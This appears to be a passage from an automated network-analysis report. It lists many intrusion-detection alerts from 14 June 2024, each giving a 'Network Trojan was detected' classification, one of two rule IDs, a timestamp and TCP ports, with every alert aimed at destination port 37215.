                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717789
                SID:2835222
                Source Port:56896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179003
                SID:2829579
                Source Port:41162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198333
                SID:2835222
                Source Port:36374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677505
                SID:2829579
                Source Port:52090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246146
                SID:2835222
                Source Port:37474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967577
                SID:2835222
                Source Port:44824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857718
                SID:2835222
                Source Port:57908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.078592
                SID:2835222
                Source Port:37388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163593
                SID:2835222
                Source Port:39910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503299
                SID:2829579
                Source Port:46558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968781
                SID:2829579
                Source Port:44928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275227
                SID:2835222
                Source Port:43274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031284
                SID:2829579
                Source Port:47170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792246
                SID:2835222
                Source Port:41080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.918004
                SID:2829579
                Source Port:49282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661885
                SID:2829579
                Source Port:49176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808348
                SID:2835222
                Source Port:45432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777292
                SID:2829579
                Source Port:45056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029991
                SID:2835222
                Source Port:33058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669074
                SID:2835222
                Source Port:52492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943381
                SID:2829579
                Source Port:56968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.081921
                SID:2829579
                Source Port:51678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.079211
                SID:2835222
                Source Port:54270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146550
                SID:2829579
                Source Port:34358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811588
                SID:2835222
                Source Port:33312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979856
                SID:2835222
                Source Port:35016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030036
                SID:2835222
                Source Port:50956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275721
                SID:2829579
                Source Port:41768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788911
                SID:2835222
                Source Port:43442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810475
                SID:2829579
                Source Port:50136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761513
                SID:2829579
                Source Port:43162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670390
                SID:2829579
                Source Port:36604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182577
                SID:2829579
                Source Port:42724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182685
                SID:2829579
                Source Port:33958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944234
                SID:2829579
                Source Port:39408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717996
                SID:2829579
                Source Port:42142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670512
                SID:2829579
                Source Port:35284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915533
                SID:2835222
                Source Port:51842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134392
                SID:2829579
                Source Port:43766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791107
                SID:2835222
                Source Port:34928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243620
                SID:2829579
                Source Port:59708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071846
                SID:2829579
                Source Port:53712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761645
                SID:2835222
                Source Port:47088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849836
                SID:2835222
                Source Port:57610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.113773
                SID:2835222
                Source Port:58236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967603
                SID:2835222
                Source Port:50018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625094
                SID:2829579
                Source Port:37836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365590
                SID:2835222
                Source Port:44782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423356
                SID:2829579
                Source Port:35086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150815
                SID:2829579
                Source Port:51660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199958
                SID:2835222
                Source Port:56680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075075
                SID:2835222
                Source Port:52730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667980
                SID:2835222
                Source Port:36932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448974
                SID:2829579
                Source Port:36972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504570
                SID:2829579
                Source Port:49380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766314
                SID:2829579
                Source Port:43126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898097
                SID:2829579
                Source Port:41292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072706
                SID:2829579
                Source Port:34466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451006
                SID:2835222
                Source Port:55050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703808
                SID:2835222
                Source Port:41946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668844
                SID:2829579
                Source Port:50838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915854
                SID:2829579
                Source Port:51220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978347
                SID:2835222
                Source Port:51338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182278
                SID:2829579
                Source Port:39840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546973
                SID:2835222
                Source Port:49142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763137
                SID:2829579
                Source Port:46106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074652
                SID:2835222
                Source Port:42842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661732
                SID:2835222
                Source Port:55210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147085
                SID:2829579
                Source Port:45742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942406
                SID:2835222
                Source Port:37212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762699
                SID:2829579
                Source Port:42398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276750
                SID:2835222
                Source Port:46606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683805
                SID:2829579
                Source Port:52564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980798
                SID:2835222
                Source Port:57328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.912782
                SID:2835222
                Source Port:55292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733202
                SID:2835222
                Source Port:36304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322423
                SID:2829579
                Source Port:33168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831312
                SID:2829579
                Source Port:48982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791129
                SID:2829579
                Source Port:59792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733245
                SID:2829579
                Source Port:52138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227336
                SID:2835222
                Source Port:38314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182014
                SID:2829579
                Source Port:38358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322197
                SID:2835222
                Source Port:51348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411672
                SID:2829579
                Source Port:60848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143624
                SID:2829579
                Source Port:33228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471629
                SID:2835222
                Source Port:35582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777722
                SID:2835222
                Source Port:36186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134363
                SID:2835222
                Source Port:60018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861027
                SID:2835222
                Source Port:48822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471822
                SID:2835222
                Source Port:47626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.780042
                SID:2835222
                Source Port:50460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083970
                SID:2835222
                Source Port:44076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670170
                SID:2835222
                Source Port:44620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253320
                SID:2835222
                Source Port:43180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407445
                SID:2835222
                Source Port:34586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053043
                SID:2835222
                Source Port:48644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521462
                SID:2835222
                Source Port:45264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915601
                SID:2835222
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641910
                SID:2835222
                Source Port:39608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614483
                SID:2835222
                Source Port:42504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972251
                SID:2835222
                Source Port:57490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640527
                SID:2835222
                Source Port:60762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502884
                SID:2829579
                Source Port:41152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543503
                SID:2835222
                Source Port:59172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943929
                SID:2829579
                Source Port:53468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025550
                SID:2835222
                Source Port:42428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779625
                SID:2829579
                Source Port:41100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846551
                SID:2835222
                Source Port:45766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165011
                SID:2829579
                Source Port:53624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563271
                SID:2829579
                Source Port:45704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915263
                SID:2829579
                Source Port:43856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293414
                SID:2829579
                Source Port:45010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011062
                SID:2835222
                Source Port:41394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423481
                SID:2835222
                Source Port:37084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850205
                SID:2835222
                Source Port:49252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184012
                SID:2829579
                Source Port:43082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384498
                SID:2829579
                Source Port:60826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024623
                SID:2829579
                Source Port:36030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132586
                SID:2829579
                Source Port:37684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681507
                SID:2829579
                Source Port:60342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179576
                SID:2835222
                Source Port:50184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807828
                SID:2829579
                Source Port:58510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452952
                SID:2835222
                Source Port:38638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023358
                SID:2829579
                Source Port:49062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027772
                SID:2835222
                Source Port:44940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614170
                SID:2829579
                Source Port:57740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152837
                SID:2829579
                Source Port:49866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520113
                SID:2835222
                Source Port:52116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732701
                SID:2835222
                Source Port:38640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547503
                SID:2835222
                Source Port:34936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075019
                SID:2835222
                Source Port:40804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000189
                SID:2829579
                Source Port:60468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726373
                SID:2835222
                Source Port:46270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203273
                SID:2829579
                Source Port:39416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016256
                SID:2829579
                Source Port:41066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520321
                SID:2835222
                Source Port:51478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025431
                SID:2829579
                Source Port:54786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763326
                SID:2829579
                Source Port:57784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917125
                SID:2835222
                Source Port:56816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684621
                SID:2829579
                Source Port:38036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028056
                SID:2829579
                Source Port:53372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662099
                SID:2835222
                Source Port:37748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545445
                SID:2829579
                Source Port:39464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672446
                SID:2835222
                Source Port:48480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777754
                SID:2835222
                Source Port:40006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184370
                SID:2829579
                Source Port:47790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504116
                SID:2835222
                Source Port:50254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364549
                SID:2829579
                Source Port:52782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273706
                SID:2835222
                Source Port:47484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184115
                SID:2829579
                Source Port:37974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028201
                SID:2835222
                Source Port:35136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082305
                SID:2835222
                Source Port:37312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897085
                SID:2829579
                Source Port:35854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545999
                SID:2829579
                Source Port:41246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672102
                SID:2835222
                Source Port:33012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704863
                SID:2829579
                Source Port:46958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163912
                SID:2835222
                Source Port:35054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294216
                SID:2835222
                Source Port:40322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717324
                SID:2829579
                Source Port:50072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763452
                SID:2835222
                Source Port:54094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726207
                SID:2835222
                Source Port:42844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.254018
                SID:2835222
                Source Port:42846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980837
                SID:2835222
                Source Port:36616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672196
                SID:2835222
                Source Port:60902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449449
                SID:2829579
                Source Port:42478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420350
                SID:2835222
                Source Port:57012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727456
                SID:2829579
                Source Port:56074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091579
                SID:2829579
                Source Port:36358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146794
                SID:2829579
                Source Port:60250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859093
                SID:2835222
                Source Port:46896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091491
                SID:2829579
                Source Port:44436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969316
                SID:2835222
                Source Port:55286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422200
                SID:2829579
                Source Port:43126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661100
                SID:2829579
                Source Port:53186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519183
                SID:2829579
                Source Port:59432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804759
                SID:2829579
                Source Port:60480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775538
                SID:2829579
                Source Port:55706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054989
                SID:2835222
                Source Port:33700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715825
                SID:2835222
                Source Port:36264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850178
                SID:2835222
                Source Port:52332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686757
                SID:2829579
                Source Port:59054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501825
                SID:2835222
                Source Port:39882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.714835
                SID:2835222
                Source Port:58990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831577
                SID:2835222
                Source Port:36928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384524
                SID:2835222
                Source Port:55578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913468
                SID:2835222
                Source Port:38498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943362
                SID:2835222
                Source Port:46616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112201
                SID:2829579
                Source Port:56764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830071
                SID:2835222
                Source Port:48414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198638
                SID:2835222
                Source Port:37312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881036
                SID:2835222
                Source Port:51254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662326
                SID:2835222
                Source Port:57648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502528
                SID:2835222
                Source Port:39940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.581705
                SID:2829579
                Source Port:40402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073372
                SID:2835222
                Source Port:48938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151034
                SID:2835222
                Source Port:59482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505133
                SID:2835222
                Source Port:40526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
